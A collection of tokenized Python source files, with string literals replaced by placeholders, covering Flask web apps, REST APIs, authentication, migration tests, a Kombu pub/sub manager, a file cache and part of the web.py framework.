( None , <NUM_LIT:1> ) <EOL> d = parse_dict_header ( auth_info ) <EOL> a1 = '<STR_LIT>' + d [ '<STR_LIT>' ] + '<STR_LIT>' <EOL> ha1 = md5 ( a1 ) . hexdigest ( ) <EOL> a2 = '<STR_LIT>' <EOL> ha2 = md5 ( a2 ) . hexdigest ( ) <EOL> a3 = ha1 + '<STR_LIT::>' + d [ '<STR_LIT>' ] + '<STR_LIT::>' + ha2 <EOL> auth_response = md5 ( a3 ) . hexdigest ( ) <EOL> response = self . client . get ( <EOL> '<STR_LIT>' , headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( d [ '<STR_LIT>' ] , <EOL> d [ '<STR_LIT>' ] , <EOL> auth_response , <EOL> d [ '<STR_LIT>' ] ) } ) <EOL> self . assertEqual ( response . data , b'<STR_LIT>' ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import shutil <EOL> import unittest <EOL> import subprocess <EOL> import shlex <EOL> import sqlite3 <EOL> def run_cmd ( cmd ) : <EOL> """<STR_LIT>""" <EOL> process = subprocess . Popen ( shlex . split ( cmd ) , stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> ( stdout , stderr ) = process . communicate ( ) <EOL> return stdout , stderr , process . wait ( ) <EOL> class TestMigrate ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> os . chdir ( os . path . split ( os . path . abspath ( __file__ ) ) [ <NUM_LIT:0> ] ) <EOL> try : <EOL> os . remove ( '<STR_LIT>' ) <EOL> os . remove ( '<STR_LIT>' ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> shutil . rmtree ( '<STR_LIT>' ) <EOL> except OSError : <EOL> pass <EOL> def tearDown ( self ) : <EOL> try : <EOL> os . remove ( '<STR_LIT>' ) <EOL> os . remove ( '<STR_LIT>' ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> shutil . rmtree ( '<STR_LIT>' ) <EOL> except OSError : <EOL> pass <EOL> def test_multidb_migrate_upgrade ( self ) : <EOL> ( o , e , s ) = run_cmd ( '<STR_LIT>' ) <EOL> self . assertTrue ( s == <NUM_LIT:0> ) <EOL> ( o , e , s ) = run_cmd ( '<STR_LIT>' ) <EOL> self . assertTrue ( s == <NUM_LIT:0> ) <EOL> ( o , e , s ) = run_cmd ( '<STR_LIT>' ) <EOL> self . assertTrue ( s == <NUM_LIT:0> ) <EOL> conn1 = sqlite3 . connect ( '<STR_LIT>' ) <EOL> c = conn1 . cursor ( ) <EOL> c . execute ( '<STR_LIT>' ) <EOL> tables = c . fetchall ( ) <EOL> conn1 . close ( ) <EOL> self . assertEqual ( tables , [ ( '<STR_LIT>' , ) , ( '<STR_LIT:user>' , ) ] ) <EOL> conn2 = sqlite3 . connect ( '<STR_LIT>' ) <EOL> c = conn2 . cursor ( ) <EOL> c . execute ( '<STR_LIT>' ) <EOL> tables = c . fetchall ( ) <EOL> conn2 . close ( ) <EOL> self . assertEqual ( tables , [ ( '<STR_LIT>' , ) , ( '<STR_LIT>' , ) ] ) <EOL> from . app_multidb import db , User , Group <EOL> db . session . add ( User ( name = '<STR_LIT:test>' ) ) <EOL> db . session . add ( Group ( name = '<STR_LIT>' ) ) <EOL> db . session . commit ( ) <EOL> ( o , e , s ) = run_cmd ( '<STR_LIT>' ) <EOL> self . assertTrue ( s == <NUM_LIT:0> ) <EOL> conn1 = sqlite3 . connect ( '<STR_LIT>' ) <EOL> c = conn1 . cursor ( ) <EOL> c . execute ( '<STR_LIT>' ) <EOL> tables = c . fetchall ( ) <EOL> conn1 . close ( ) <EOL> self . assertEqual ( tables , [ ( '<STR_LIT>' , ) ] ) <EOL> conn2 = sqlite3 . connect ( '<STR_LIT>' ) <EOL> c = conn2 . cursor ( ) <EOL> c . execute ( '<STR_LIT>' ) <EOL> tables = c . fetchall ( ) <EOL> conn2 . close ( ) <EOL> self . assertEqual ( tables , [ ( '<STR_LIT>' , ) ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import six <EOL> from flask import Flask , jsonify , abort , request , make_response , url_for <EOL> from flask . ext . httpauth import HTTPBasicAuth <EOL> app = Flask ( __name__ , static_url_path = "<STR_LIT>" ) <EOL> auth = HTTPBasicAuth ( ) <EOL> @ auth . get_password <EOL> def get_password ( username ) : <EOL> if username == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> return None <EOL> @ auth . error_handler <EOL> def unauthorized ( ) : <EOL> return make_response ( jsonify ( { '<STR_LIT:error>' : '<STR_LIT>' } ) , <NUM_LIT> ) <EOL> @ app . errorhandler ( <NUM_LIT> ) <EOL> def bad_request ( error ) : <EOL> return make_response ( jsonify ( { '<STR_LIT:error>' : '<STR_LIT>' } ) , <NUM_LIT> ) <EOL> @ app . errorhandler ( <NUM_LIT> ) <EOL> def not_found ( error ) : <EOL> return make_response ( jsonify ( { '<STR_LIT:error>' : '<STR_LIT>' } ) , <NUM_LIT> ) <EOL> tasks = [ <EOL> { <EOL> '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT:title>' : u'<STR_LIT>' , <EOL> '<STR_LIT:description>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT:title>' : u'<STR_LIT>' , <EOL> '<STR_LIT:description>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } <EOL> ] <EOL> def make_public_task ( task ) : <EOL> new_task = { } <EOL> for field in task : <EOL> if field == '<STR_LIT:id>' : <EOL> new_task [ '<STR_LIT>' ] = url_for ( '<STR_LIT>' , task_id = task [ '<STR_LIT:id>' ] , <EOL> _external = True ) <EOL> else : <EOL> new_task [ field ] = task [ field ] <EOL> return new_task <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' ] ) <EOL> @ auth . login_required <EOL> def get_tasks ( ) : <EOL> return jsonify ( { '<STR_LIT>' : [ make_public_task ( task ) for task in tasks ] } ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' ] ) <EOL> @ auth . login_required <EOL> def get_task ( task_id ) : <EOL> task = [ task for task in tasks if task [ '<STR_LIT:id>' ] == task_id ] <EOL> if len ( task ) == <NUM_LIT:0> : <EOL> abort ( <NUM_LIT> ) <EOL> return jsonify ( { '<STR_LIT>' : make_public_task ( task [ <NUM_LIT:0> ] ) } ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ auth . login_required <EOL> def create_task ( ) : <EOL> if not request . json or '<STR_LIT:title>' not in request . json : <EOL> abort ( <NUM_LIT> ) <EOL> task = { <EOL> '<STR_LIT:id>' : tasks [ - <NUM_LIT:1> ] [ '<STR_LIT:id>' ] + <NUM_LIT:1> , <EOL> '<STR_LIT:title>' : request . json [ '<STR_LIT:title>' ] , <EOL> '<STR_LIT:description>' : request . json . get ( '<STR_LIT:description>' , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : False <EOL> } <EOL> tasks . append ( task ) <EOL> return jsonify ( { '<STR_LIT>' : make_public_task ( task ) } ) , <NUM_LIT> <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT>' ] ) <EOL> @ auth . login_required <EOL> def update_task ( task_id ) : <EOL> task = [ task for task in tasks if task [ '<STR_LIT:id>' ] == task_id ] <EOL> if len ( task ) == <NUM_LIT:0> : <EOL> abort ( <NUM_LIT> ) <EOL> if not request . json : <EOL> abort ( <NUM_LIT> ) <EOL> if '<STR_LIT:title>' in request . json and not isinstance ( request . json [ '<STR_LIT:title>' ] , six . string_types ) : <EOL> abort ( <NUM_LIT> ) <EOL> if '<STR_LIT:description>' in request . json and not isinstance ( request . json [ '<STR_LIT:description>' ] , six . string_types ) : <EOL> abort ( <NUM_LIT> ) <EOL> if '<STR_LIT>' in request . json and type ( request . json [ '<STR_LIT>' ] ) is not bool : <EOL> abort ( <NUM_LIT> ) <EOL> task [ <NUM_LIT:0> ] [ '<STR_LIT:title>' ] = request . json . get ( '<STR_LIT:title>' , task [ <NUM_LIT:0> ] [ '<STR_LIT:title>' ] ) <EOL> task [ <NUM_LIT:0> ] [ '<STR_LIT:description>' ] = request . json . get ( '<STR_LIT:description>' , <EOL> task [ <NUM_LIT:0> ] [ '<STR_LIT:description>' ] ) <EOL> task [ <NUM_LIT:0> ] [ '<STR_LIT>' ] = request . json . get ( '<STR_LIT>' , task [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> return jsonify ( { '<STR_LIT>' : make_public_task ( task [ <NUM_LIT:0> ] ) } ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT>' ] ) <EOL> @ auth . login_required <EOL> def delete_task ( task_id ) : <EOL> task = [ task for task in tasks if task [ '<STR_LIT:id>' ] == task_id ] <EOL> if len ( task ) == <NUM_LIT:0> : <EOL> abort ( <NUM_LIT> ) <EOL> tasks . remove ( task [ <NUM_LIT:0> ] ) <EOL> return jsonify ( { '<STR_LIT:result>' : True } ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( debug = True ) </s>
<s> from flask import request <EOL> from . . models import db , Class , Registration <EOL> from . . decorators import json , collection , etag <EOL> from . import api <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' ] ) <EOL> @ etag <EOL> @ json <EOL> @ collection ( Class ) <EOL> def get_classes ( ) : <EOL> return Class . query <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' ] ) <EOL> @ etag <EOL> @ json <EOL> def get_class ( id ) : <EOL> return Class . query . get_or_404 ( id ) <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' ] ) <EOL> @ etag <EOL> @ json <EOL> @ collection ( Registration ) <EOL> def get_class_registrations ( id ) : <EOL> class_ = Class . query . get_or_404 ( id ) <EOL> return class_ . registrations <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ json <EOL> def new_class ( ) : <EOL> class_ = Class ( ) . import_data ( request . get_json ( force = True ) ) <EOL> db . session . add ( class_ ) <EOL> db . session . commit ( ) <EOL> return { } , <NUM_LIT> , { '<STR_LIT>' : class_ . get_url ( ) } <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ json <EOL> def new_class_registration ( id ) : <EOL> class_ = Class . query . get_or_404 ( id ) <EOL> data = request . get_json ( force = True ) <EOL> data [ '<STR_LIT>' ] = class_ . get_url ( ) <EOL> reg = Registration ( ) . import_data ( data ) <EOL> db . session . add ( reg ) <EOL> db . session . commit ( ) <EOL> return { } , <NUM_LIT> , { '<STR_LIT>' : reg . get_url ( ) } <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT>' ] ) <EOL> @ json <EOL> def edit_class ( id ) : <EOL> class_ = Class . query . get_or_404 ( id ) <EOL> class_ . import_data ( request . get_json ( force = True ) ) <EOL> db . session . add ( class_ ) <EOL> db . session . commit ( ) <EOL> return { } <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT>' ] ) <EOL> @ json <EOL> def delete_class ( id ) : <EOL> class_ = Class . query . get_or_404 ( id ) <EOL> db . session . delete ( class_ ) <EOL> db . session . commit ( ) <EOL> return { } </s>
<s> from flask import render_template , current_app , request , redirect , url_for , flash <EOL> from flask . ext . login import login_user , logout_user , login_required <EOL> from . . models import User <EOL> from . import auth <EOL> from . forms import LoginForm <EOL> @ auth . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def login ( ) : <EOL> if not current_app . config [ '<STR_LIT>' ] and not current_app . config [ '<STR_LIT>' ] and not request . is_secure : <EOL> return redirect ( url_for ( '<STR_LIT>' , _external = True , _scheme = '<STR_LIT>' ) ) <EOL> form = LoginForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> user = User . query . filter_by ( email = form . email . data ) . first ( ) <EOL> if user is None or not user . verify_password ( form . password . data ) : <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> login_user ( user , form . remember_me . data ) <EOL> return redirect ( request . args . get ( '<STR_LIT>' ) or url_for ( '<STR_LIT>' ) ) <EOL> return render_template ( '<STR_LIT>' , form = form ) <EOL> @ auth . route ( '<STR_LIT>' ) <EOL> @ login_required <EOL> def logout ( ) : <EOL> logout_user ( ) <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) </s>
<s> import os <EOL> COV = None <EOL> if os . environ . get ( '<STR_LIT>' ) : <EOL> import coverage <EOL> COV = coverage . coverage ( branch = True , include = '<STR_LIT>' ) <EOL> COV . start ( ) <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' ) <EOL> for line in open ( '<STR_LIT>' ) : <EOL> var = line . strip ( ) . split ( '<STR_LIT:=>' ) <EOL> if len ( var ) == <NUM_LIT:2> : <EOL> os . environ [ var [ <NUM_LIT:0> ] ] = var [ <NUM_LIT:1> ] <EOL> from app import create_app , db <EOL> from app . models import User , Follow , Role , Permission , Post , Comment <EOL> from flask . ext . script import Manager , Shell <EOL> from flask . ext . migrate import Migrate , MigrateCommand <EOL> app = create_app ( os . getenv ( '<STR_LIT>' ) or '<STR_LIT:default>' ) <EOL> manager = Manager ( app ) <EOL> migrate = Migrate ( app , db ) <EOL> def make_shell_context ( ) : <EOL> return dict ( app = app , db = db , User = User , Follow = Follow , Role = Role , <EOL> Permission = Permission , Post = Post , Comment = Comment ) <EOL> manager . add_command ( "<STR_LIT>" , Shell ( make_context = make_shell_context ) ) <EOL> manager . add_command ( '<STR_LIT>' , MigrateCommand ) <EOL> @ manager . command <EOL> def test ( coverage = False ) : <EOL> """<STR_LIT>""" <EOL> if coverage and not os . environ . get ( '<STR_LIT>' ) : <EOL> import sys <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:1>' <EOL> os . execvp ( sys . executable , [ sys . executable ] + sys . argv ) <EOL> import unittest <EOL> tests = unittest . TestLoader ( ) . discover ( '<STR_LIT>' ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( tests ) <EOL> if COV : <EOL> COV . stop ( ) <EOL> COV . save ( ) <EOL> print ( '<STR_LIT>' ) <EOL> COV . report ( ) <EOL> basedir = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> covdir = os . path . join ( basedir , '<STR_LIT>' ) <EOL> COV . html_report ( directory = covdir ) <EOL> print ( '<STR_LIT>' % covdir ) <EOL> COV . erase ( ) <EOL> @ manager . command <EOL> def profile ( length = <NUM_LIT> , profile_dir = None ) : <EOL> """<STR_LIT>""" <EOL> from werkzeug . contrib . profiler import ProfilerMiddleware <EOL> app . wsgi_app = ProfilerMiddleware ( app . wsgi_app , restrictions = [ length ] , <EOL> profile_dir = profile_dir ) <EOL> app . run ( ) <EOL> @ manager . command <EOL> def deploy ( ) : <EOL> """<STR_LIT>""" <EOL> from flask . ext . migrate import upgrade <EOL> from app . models import Role , User <EOL> upgrade ( ) <EOL> Role . insert_roles ( ) <EOL> User . add_self_follows ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> manager . run ( ) </s>
<s> import os <EOL> import sys <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> pybabel = '<STR_LIT>' <EOL> else : <EOL> pybabel = '<STR_LIT>' <EOL> os . system ( pybabel + '<STR_LIT>' ) <EOL> os . system ( pybabel + '<STR_LIT>' ) <EOL> os . unlink ( '<STR_LIT>' ) </s>
<s> from flask import Flask , render_template <EOL> app = Flask ( __name__ ) <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def user ( name ) : <EOL> return render_template ( '<STR_LIT>' , name = name ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( debug = True ) </s>
<s> import os <EOL> from flask import Flask <EOL> from flask . ext . bootstrap import Bootstrap <EOL> from flask . ext . sqlalchemy import SQLAlchemy <EOL> from flask . ext . login import LoginManager <EOL> bootstrap = Bootstrap ( ) <EOL> db = SQLAlchemy ( ) <EOL> lm = LoginManager ( ) <EOL> lm . login_view = '<STR_LIT>' <EOL> def create_app ( config_name ) : <EOL> """<STR_LIT>""" <EOL> app = Flask ( __name__ ) <EOL> cfg = os . path . join ( os . getcwd ( ) , '<STR_LIT>' , config_name + '<STR_LIT>' ) <EOL> app . config . from_pyfile ( cfg ) <EOL> bootstrap . init_app ( app ) <EOL> db . init_app ( app ) <EOL> lm . init_app ( app ) <EOL> from . main import main as main_blueprint <EOL> app . register_blueprint ( main_blueprint ) <EOL> if not app . config [ '<STR_LIT>' ] and not app . config [ '<STR_LIT>' ] : <EOL> import logging <EOL> from logging . handlers import SMTPHandler <EOL> mail_handler = SMTPHandler ( '<STR_LIT:127.0.0.1>' , '<STR_LIT>' , <EOL> app . config [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> mail_handler . setLevel ( logging . ERROR ) <EOL> app . logger . addHandler ( mail_handler ) <EOL> return app </s>
<s> import pickle <EOL> import uuid <EOL> try : <EOL> import kombu <EOL> except ImportError : <EOL> kombu = None <EOL> from . pubsub_manager import PubSubManager <EOL> class KombuManager ( PubSubManager ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> def __init__ ( self , url = '<STR_LIT>' , <EOL> channel = '<STR_LIT>' , write_only = False ) : <EOL> if kombu is None : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> super ( KombuManager , self ) . __init__ ( channel = channel ) <EOL> self . url = url <EOL> self . writer_conn = kombu . Connection ( self . url ) <EOL> self . writer_queue = self . _queue ( self . writer_conn ) <EOL> def _queue ( self , conn = None ) : <EOL> exchange = kombu . Exchange ( self . channel , type = '<STR_LIT>' , durable = False ) <EOL> queue = kombu . Queue ( str ( uuid . uuid4 ( ) ) , exchange ) <EOL> return queue <EOL> def _publish ( self , data ) : <EOL> with self . writer_conn . SimpleQueue ( self . writer_queue ) as queue : <EOL> queue . put ( pickle . dumps ( data ) ) <EOL> def _listen ( self ) : <EOL> reader_conn = kombu . Connection ( self . url ) <EOL> reader_queue = self . _queue ( reader_conn ) <EOL> with reader_conn . SimpleQueue ( reader_queue ) as queue : <EOL> while True : <EOL> message = queue . get ( block = True ) <EOL> message . ack ( ) <EOL> yield message . payload </s>
<s> import md5 <EOL> import os <EOL> import tempfile <EOL> import cPickle <EOL> class FileCacheError ( Exception ) : <EOL> '''<STR_LIT>''' <EOL> class FileCache ( object ) : <EOL> DEPTH = <NUM_LIT:3> <EOL> def __init__ ( self , root_directory = None ) : <EOL> self . _InitializeRootDirectory ( root_directory ) <EOL> def Get ( self , key ) : <EOL> path = self . _GetPath ( key ) <EOL> if os . path . exists ( path ) : <EOL> return cPickle . load ( open ( path ) ) <EOL> else : <EOL> return None <EOL> def Set ( self , key , data ) : <EOL> path = self . _GetPath ( key ) <EOL> directory = os . path . dirname ( path ) <EOL> if not os . path . exists ( directory ) : <EOL> os . makedirs ( directory ) <EOL> if not os . path . isdir ( directory ) : <EOL> raise FileCacheError ( '<STR_LIT>' % directory ) <EOL> temp_fd , temp_path = tempfile . mkstemp ( ) <EOL> temp_fp = os . fdopen ( temp_fd , '<STR_LIT:w>' ) <EOL> cPickle . dump ( data , temp_fp ) <EOL> temp_fp . close ( ) <EOL> if not path . startswith ( self . _root_directory ) : <EOL> raise FileCacheError ( '<STR_LIT>' % <EOL> ( path , self . _root_directory ) ) <EOL> if os . path . exists ( path ) : <EOL> os . remove ( path ) <EOL> os . rename ( temp_path , path ) <EOL> def Remove ( self , key ) : <EOL> path = self . _GetPath ( key ) <EOL> if not path . startswith ( self . _root_directory ) : <EOL> raise FileCacheError ( '<STR_LIT>' % <EOL> ( path , self . _root_directory ) ) <EOL> if os . path . exists ( path ) : <EOL> os . remove ( path ) <EOL> def GetCachedTime ( self , key ) : <EOL> path = self . _GetPath ( key ) <EOL> if os . path . exists ( path ) : <EOL> return os . path . getmtime ( path ) <EOL> else : <EOL> return None <EOL> def _GetUsername ( self ) : <EOL> '''<STR_LIT>''' <EOL> return os . getenv ( '<STR_LIT>' ) or os . getenv ( '<STR_LIT>' ) or os . getenv ( '<STR_LIT>' ) or os . getlogin ( ) or '<STR_LIT>' <EOL> def _GetTmpCachePath ( self ) : <EOL> username = self . _GetUsername ( ) <EOL> cache_directory = '<STR_LIT>' + username <EOL> return os . path . join ( tempfile . gettempdir ( ) , cache_directory ) <EOL> def _InitializeRootDirectory ( self , root_directory ) : <EOL> if not root_directory : <EOL> root_directory = self . _GetTmpCachePath ( ) <EOL> root_directory = os . path . abspath ( root_directory ) <EOL> if not os . path . exists ( root_directory ) : <EOL> os . mkdir ( root_directory ) <EOL> if not os . path . isdir ( root_directory ) : <EOL> raise FileCacheError ( '<STR_LIT>' % <EOL> root_directory ) <EOL> self . _root_directory = root_directory <EOL> def _GetPath ( self , key ) : <EOL> hashed_key = md5 . new ( key ) . hexdigest ( ) <EOL> return os . path . join ( self . _root_directory , <EOL> self . _GetPrefix ( hashed_key ) , <EOL> hashed_key ) <EOL> def _GetPrefix ( self , hashed_key ) : <EOL> return os . path . sep . join ( hashed_key [ <NUM_LIT:0> : FileCache . DEPTH ] ) </s>
<s> """<STR_LIT>""" <EOL> import webapi as web <EOL> import webapi , wsgi , utils <EOL> import debugerror <EOL> import httpserver <EOL> from utils import lstrips , safeunicode <EOL> import sys <EOL> import urllib <EOL> import traceback <EOL> import itertools <EOL> import os <EOL> import types <EOL> from exceptions import SystemExit <EOL> try : <EOL> import wsgiref . handlers <EOL> except ImportError : <EOL> pass <EOL> __all__ = [ <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> class application : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , mapping = ( ) , fvars = { } , autoreload = None ) : <EOL> if autoreload is None : <EOL> autoreload = web . config . get ( '<STR_LIT>' , False ) <EOL> self . init_mapping ( mapping ) <EOL> self . fvars = fvars <EOL> self . processors = [ ] <EOL> self . add_processor ( loadhook ( self . _load ) ) <EOL> self . add_processor ( unloadhook ( self . _unload ) ) <EOL> if autoreload : <EOL> def main_module_name ( ) : <EOL> mod = sys . modules [ '<STR_LIT:__main__>' ] <EOL> file = getattr ( mod , '<STR_LIT>' , None ) <EOL> return file and os . path . splitext ( os . path . basename ( file ) ) [ <NUM_LIT:0> ] <EOL> def modname ( fvars ) : <EOL> """<STR_LIT>""" <EOL> file , name = fvars . get ( '<STR_LIT>' ) , fvars . get ( '<STR_LIT>' ) <EOL> if file is None or name is None : <EOL> return None <EOL> if name == '<STR_LIT:__main__>' : <EOL> name = main_module_name ( ) <EOL> return name <EOL> mapping_name = utils . dictfind ( fvars , mapping ) <EOL> module_name = modname ( fvars ) <EOL> def reload_mapping ( ) : <EOL> """<STR_LIT>""" <EOL> mod = __import__ ( module_name , None , None , [ '<STR_LIT>' ] ) <EOL> mapping = getattr ( mod , mapping_name , None ) <EOL> if mapping : <EOL> self . fvars = mod . __dict__ <EOL> self . init_mapping ( mapping ) <EOL> self . add_processor ( loadhook ( Reloader ( ) ) ) <EOL> if mapping_name and module_name : <EOL> self . add_processor ( loadhook ( reload_mapping ) ) <EOL> if main_module_name ( ) and '<STR_LIT:__main__>' in sys . argv : <EOL> try : <EOL> __import__ ( main_module_name ( ) ) <EOL> except ImportError : <EOL> pass <EOL> def _load ( self ) : <EOL> web . ctx . app_stack . append ( self ) <EOL> def _unload ( self ) : <EOL> web . ctx . app_stack = web . ctx . app_stack [ : - <NUM_LIT:1> ] <EOL> if web . ctx . app_stack : <EOL> oldctx = web . ctx . get ( '<STR_LIT>' ) <EOL> if oldctx : <EOL> web . ctx . home = oldctx . home <EOL> web . ctx . homepath = oldctx . homepath <EOL> web . ctx . path = oldctx . path <EOL> web . ctx . fullpath = oldctx . fullpath <EOL> def _cleanup ( self ) : <EOL> utils . ThreadedDict . clear_all ( ) <EOL> def init_mapping ( self , mapping ) : <EOL> self . mapping = list ( utils . group ( mapping , <NUM_LIT:2> ) ) <EOL> def add_mapping ( self , pattern , classname ) : <EOL> self . mapping . append ( ( pattern , classname ) ) <EOL> def add_processor ( self , processor ) : <EOL> """<STR_LIT>""" <EOL> self . processors . append ( processor ) <EOL> def request ( self , localpart = '<STR_LIT:/>' , method = '<STR_LIT:GET>' , data = None , <EOL> host = "<STR_LIT>" , headers = None , https = False , ** kw ) : <EOL> """<STR_LIT>""" <EOL> path , maybe_query = urllib . splitquery ( localpart ) <EOL> query = maybe_query or "<STR_LIT>" <EOL> if '<STR_LIT>' in kw : <EOL> env = kw [ '<STR_LIT>' ] <EOL> else : <EOL> env = { } <EOL> env = dict ( env , HTTP_HOST = host , REQUEST_METHOD = method , PATH_INFO = path , QUERY_STRING = query , HTTPS = str ( https ) ) <EOL> headers = headers or { } <EOL> for k , v in headers . items ( ) : <EOL> env [ '<STR_LIT>' + k . upper ( ) . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) ] = v <EOL> if '<STR_LIT>' in env : <EOL> env [ '<STR_LIT>' ] = env . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in env : <EOL> env [ '<STR_LIT>' ] = env . pop ( '<STR_LIT>' ) <EOL> if method not in [ "<STR_LIT>" , "<STR_LIT:GET>" ] : <EOL> data = data or '<STR_LIT>' <EOL> import StringIO <EOL> if isinstance ( data , dict ) : <EOL> q = urllib . urlencode ( data ) <EOL> else : <EOL> q = data <EOL> env [ '<STR_LIT>' ] = StringIO . StringIO ( q ) <EOL> if not env . get ( '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) . startswith ( '<STR_LIT>' ) and '<STR_LIT>' not in env : <EOL> env [ '<STR_LIT>' ] = len ( q ) <EOL> response = web . storage ( ) <EOL> def start_response ( status , headers ) : <EOL> response . status = status <EOL> response . headers = dict ( headers ) <EOL> response . header_items = headers <EOL> response . data = "<STR_LIT>" . join ( self . wsgifunc ( ) ( env , start_response ) ) <EOL> return response <EOL> def browser ( self ) : <EOL> import browser <EOL> return browser . AppBrowser ( self ) <EOL> def handle ( self ) : <EOL> fn , args = self . _match ( self . mapping , web . ctx . path ) <EOL> return self . _delegate ( fn , self . fvars , args ) <EOL> def handle_with_processors ( self ) : <EOL> def process ( processors ) : <EOL> try : <EOL> if processors : <EOL> p , processors = processors [ <NUM_LIT:0> ] , processors [ <NUM_LIT:1> : ] <EOL> return p ( lambda : process ( processors ) ) <EOL> else : <EOL> return self . handle ( ) <EOL> except web . HTTPError : <EOL> raise <EOL> except ( KeyboardInterrupt , SystemExit ) : <EOL> raise <EOL> except : <EOL> print >> web . debug , traceback . format_exc ( ) <EOL> raise self . internalerror ( ) <EOL> return process ( self . processors ) <EOL> def wsgifunc ( self , * middleware ) : <EOL> """<STR_LIT>""" <EOL> def peep ( iterator ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> firstchunk = iterator . next ( ) <EOL> except StopIteration : <EOL> firstchunk = '<STR_LIT>' <EOL> return itertools . chain ( [ firstchunk ] , iterator ) <EOL> def is_generator ( x ) : return x and hasattr ( x , '<STR_LIT>' ) <EOL> def wsgi ( env , start_resp ) : <EOL> self . _cleanup ( ) <EOL> self . load ( env ) <EOL> try : <EOL> if web . ctx . method . upper ( ) != web . ctx . method : <EOL> raise web . nomethod ( ) <EOL> result = self . handle_with_processors ( ) <EOL> if is_generator ( result ) : <EOL> result = peep ( result ) <EOL> else : <EOL> result = [ result ] <EOL> except web . HTTPError , e : <EOL> result = [ e . data ] <EOL> result = web . safestr ( iter ( result ) ) <EOL> status , headers = web . ctx . status , web . ctx . headers <EOL> start_resp ( status , headers ) <EOL> def cleanup ( ) : <EOL> self . _cleanup ( ) <EOL> yield '<STR_LIT>' <EOL> return itertools . chain ( result , cleanup ( ) ) <EOL> for m in middleware : <EOL> wsgi = m ( wsgi ) <EOL> return wsgi <EOL> def run ( self , * middleware ) : <EOL> """<STR_LIT>""" <EOL> return wsgi . runwsgi ( self . wsgifunc ( * middleware ) ) <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> if httpserver . server : <EOL> httpserver . server . stop ( ) <EOL> httpserver . server = None <EOL> def cgirun ( self , * middleware ) : <EOL> """<STR_LIT>""" <EOL> wsgiapp = self . wsgifunc ( * middleware ) <EOL> try : <EOL> from google . appengine . ext . webapp . util import run_wsgi_app <EOL> return run_wsgi_app ( wsgiapp ) <EOL> except ImportError : <EOL> return wsgiref . handlers . CGIHandler ( ) . run ( wsgiapp ) <EOL> def load ( self , env ) : <EOL> """<STR_LIT>""" <EOL> ctx = web . ctx <EOL> ctx . clear ( ) <EOL> ctx . status = '<STR_LIT>' <EOL> ctx . headers = [ ] <EOL> ctx . output = '<STR_LIT>' <EOL> ctx . environ = ctx . env = env <EOL> ctx . host = env . get ( '<STR_LIT>' ) <EOL> if env . get ( '<STR_LIT>' ) in [ '<STR_LIT:http>' , '<STR_LIT>' ] : <EOL> ctx . protocol = env [ '<STR_LIT>' ] <EOL> elif env . get ( '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) in [ '<STR_LIT>' , '<STR_LIT:true>' , '<STR_LIT:1>' ] : <EOL> ctx . protocol = '<STR_LIT>' <EOL> else : 